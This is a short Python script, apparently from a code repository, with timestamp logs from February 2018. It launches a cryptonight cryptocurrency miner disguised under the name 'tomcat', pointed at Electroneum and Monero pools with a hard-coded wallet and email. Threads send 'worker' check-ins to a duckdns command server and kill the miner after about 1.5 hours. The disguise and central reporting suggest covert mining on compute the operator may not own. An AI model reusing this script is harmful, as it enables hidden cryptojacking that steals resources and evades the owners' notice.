import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:22:06.189934
#2018-02-17 17:11:06.756943
#2018-02-17 18:59:04.713854
#2018-02-17 20:46:05.185507
#2018-02-17 22:32:07.355876
#2018-02-18 00:16:06.499600
#2018-02-18 02:07:04.078553
#2018-02-18 03:53:03.351146
#2018-02-18 05:39:07.200665
#2018-02-18 07:32:05.352067
#2018-02-18 09:20:08.025264
#2018-02-18 11:06:01.471729
#2018-02-18 12:53:01.676588
#2018-02-18 14:39:06.148911
#2018-02-18 16:29:01.480213
#2018-02-18 18:18:04.140092
#2018-02-18 20:03:05.320794
#2018-02-18 21:49:05.038736
#2018-02-18 23:38:07.097944
#2018-02-19 01:24:05.667016
#2018-02-19 03:12:06.758051
#2018-02-19 04:58:06.094156
#2018-02-19 06:44:01.615996
#2018-02-19 08:33:03.875893
#2018-02-19 10:22:04.483867
#2018-02-19 12:10:08.926800
#2018-02-19 13:57:04.643935
#2018-02-19 15:46:05.002690
#2018-02-19 17:33:04.215601
#2018-02-19 19:19:04.718811
#2018-02-19 21:06:07.714716
#2018-02-19 22:53:05.538684
#2018-02-20 00:36:05.343615
#2018-02-20 02:25:01.422939
#2018-02-20 04:15:08.682901
#2018-02-20 05:58:01.252601
#2018-02-20 07:43:07.261164
#2018-02-20 09:27:04.749143
#2018-02-20 11:11:07.798241
#2018-02-20 12:58:08.460791
#2018-02-20 14:44:05.240220
#2018-02-20 16:29:10.742656
#2018-02-20 18:16:04.516104
#2018-02-20 20:08:05.909179
#2018-02-20 21:56:06.315619
#2018-02-20 23:36:06.462649
#2018-02-21 01:20:07.547272
#2018-02-21 03:07:06.220859
#2018-02-21 04:54:07.269283
#2018-02-21 06:42:07.980089
#2018-02-21 08:29:01.700331
#2018-02-21 10:14:09.236435
#2018-02-21 12:03:10.311636
#2018-02-21 13:53:07.486340
#2018-02-21 15:37:07.338347
#2018-02-21 17:27:10.143908
#2018-02-21 19:21:08.374076
#2018-02-21 21:11:03.592621
#2018-02-21 22:59:08.029793
#2018-02-22 00:47:03.421420
#2018-02-22 02:36:06.998553
#2018-02-22 04:22:05.489565
#2018-02-22 06:07:09.184886
#2018-02-22 07:53:01.444114
#2018-02-22 09:41:01.985104
#2018-02-22 11:26:05.733003
#2018-02-22 13:13:02.220457
#2018-02-22 15:02:08.227490
#2018-02-22 16:47:10.361687
#2018-02-22 18:34:06.551527
#2018-02-22 20:27:05.719568
#2018-02-22 22:14:06.483596
#2018-02-23 00:00:08.187830
#2018-02-23 01:48:06.673191
#2018-02-23 03:37:07.744728
#2018-02-23 05:22:05.013739
#2018-02-23 07:08:04.506330
#2018-02-23 08:59:05.921579
#2018-02-23 11:03:08.074234
#2018-02-23 12:57:05.715120
#2018-02-23 14:42:01.407140
#2018-02-23 16:30:11.835594
#2018-02-23 18:18:07.298915
#2018-02-23 20:03:07.438228
#2018-02-23 21:47:06.146691
#2018-02-23 23:42:05.139729
#2018-02-24 01:32:05.220136
#2018-02-24 03:21:06.672000
#2018-02-24 05:06:01.715752
#2018-02-24 06:55:03.587619
#2018-02-24 08:44:04.990780
#2018-02-24 10:39:03.751323
#2018-02-24 12:25:01.088757
#2018-02-24 14:18:07.491297
#2018-02-24 16:06:05.476185
#2018-02-24 17:57:07.042075
#2018-02-24 19:44:03.923594
#2018-02-24 21:30:03.130168
#2018-02-25 00:14:04.740673
#2018-02-25 04:06:03.766886
#2018-02-25 07:36:06.332541